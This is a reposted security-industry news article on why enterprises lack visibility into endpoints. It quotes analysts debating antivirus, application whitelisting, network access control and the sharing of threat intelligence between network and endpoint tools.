Gathering More Security Data From Your Endpoints

  /     /     /  
Publicated : 22/11/2024   Category : security


Gathering More Security Data From Your Endpoints


Endpoint security intelligence and controls have not kept pace with similar visibility and management of the network



Even though many of the most troublesome and advanced threats hitting enterprise networks originate from the endpoint, most organizations today arent investing in the same kind of visibility and control over these devices as they spend on network-based controls. This disparity is leaving organizations with a huge blind spot where they need it most, experts say.
Weve seen this advancement in techniques for network-based detection, but we havent seen quite that much advancement on the endpoint, says Scott Crawford, research director for Enterprise Management Associates. And, yet, if you look at what the target is in most of these cases, the strategic target may be the users privileges to sensitive data, so the tactical objective in a lot of cases is the endpoint. Youre going to focus on compromising endpoint functionality to gain visibility into the users activities and get access to their credentials.
According to Crawford, enterprises are missing this to a large degree, with most organizations maintaining a huge dependence on legacy techniques, such as antivirus. Part of it is the scale and distribution of endpoints -- it is much more difficult to deploy technology that will give centralized views of whats happening across the endpoint infrastructure, compared to network visibility. But if organizations dont try, theyre going to miss a lot of the threat detection picture.
[Why do injection attacks still stand on top of the OWASP Top 10 2013? See
Myth-Busting SQL- And Other Injection Attacks
.]
If youre not doing a similar job of collecting intel from the endpoint that youre collecting on the network, or you cant identify where or if the endpoint has been compromised, then one of the legs of your stool is a little short, Crawford says.
This is a message that John Prisco, CEO of Triumfant, has been preaching for some time now. Hes a firm believer that organizations have to invest in gathering more information than they do from their endpoints so they can better detect the important configuration and behavioral changes that will flag malicious activity.
Youve got to be fighting the battle in the trenches, and the trenches in this case would be the endpoint, he says. You have to have something on the endpoint that isnt antivirus thats looking at changes [to the endpoint]. It has got to be looking at everything and making decisions based on normal behavior changes.
He believes that even beyond traditional antivirus, many of the advanced endpoint protection measures out today depend on the same fatal flaw.
It all comes down to the rule set thats being used -- success and failure depends on the rule set or the thing thats making the decision as to whether something is malware or not, Prisco says. There are a lot of fatal flaws out there, and theres one thing that ties them all together and thats prior knowledge. The most advance adversaries are going to defeat all those products because their rule set is predictive.
Of course, not all endpoint security plays depend on prior knowledge -- Priscos very arguments about chasing the known bad are the same ones that application control and whitelisting players have been beating the drum about for a long time. Prisco claims that whitelisting isnt feasible for endpoints -- Its really cumbersome. I dont know anybody who would try to make whitelisting products work on an endpoint -- but its a contentious point up for debate.
Neil MacDonald of Gartner recently wrote that such claims about the cumbersome nature of application control are old-fashioned and based on previous iterations of the technology.
Unfortunately, application control has a historical reputation of not being deployable or manageable for end-user systems, MacDonald says. The reality is that application control can and will be successfully deployed for end user systems and provides excellent protection from these types of [advanced] attacks.
Crawford sits in the middle, stating that at first blush application control vendors have the capability to offer some proactive level of control in high enforcement mode, but that there are limitations.
Administering high enforcement mode across a number of endpoints does very likely have its limits because you run the risk of having end users contact the support desk and saying, I cant load software I really need, and its interfering with business processes, Crawford says. Its not the solution for every endpoint for every situation.
And in those cases where infection still slips through the cracks of either white or black lists, thats where the importance of intelligence on the state of the endpoints lies. For their part, whitelisting vendors are teaming with others to offer that kind of intelligence and control. In fact, Bit9 just last week made an announcement of a partnership with Fire Eye and Palo Alto Networks
to do so
.
On his end, Prisco advocates for agent-based technology to offer the right information. Crawford says that it depends on the use case. For example, the off-host capabilities of network access control technology have come a long way from the early days of NAC, and can offer a degree of visibility into endpoints connecting onto the network.
Youve got to ask, whats the objective here? If youre looking to get a better handle on some sanity over what can access your network and what cannot, then the approach of doing preadmission inspection probably has some merit for maintaining visibility into the state of that endpoint, Crawford says. But depending on how far you want to go in terms of visibility on that host and the level of control you want to exert on that host, then in those cases you are probably going to need some on-host capabilities.
In the end, threat intelligence plays a role in bridging the gap between network intelligence and endpoint malware detection capabilities -- whatever they are. According to Mike Rothman, analyst for Securosis, bidirectional communication between both is key.
You want bidirectional communication so malware indicators found by the network device or in the cloud are accessible to endpoint agents,
Rothman wrote recently in a piece on network-based malware detection
. Additionally, you want malware identified on devices to be sent to the network for further analysis, profiling, determination, and ultimately distribution of indicators to other protected devices.
Have a comment on this story? Please click Add Your Comment below. If youd like to contact
Dark Readings
editors directly,
send us a message
.

Last News

▸ Nigerian scammers now turning into mediocre malware pushers. ◂
Discovered: 23/12/2024
Category: security

▸ Beware EMV may not fully protect against skilled thieves. ◂
Discovered: 23/12/2024
Category: security

▸ Hack Your Hotel Room ◂
Discovered: 23/12/2024
Category: security


Cyber Security Categories
Google Dorks Database
Exploits Vulnerability
Exploit Shellcodes

CVE List
Tools/Apps
News/Aarticles

Phishing Database
Deepfake Detection
Trends/Statistics & Live Infos



Tags:
Gathering More Security Data From Your Endpoints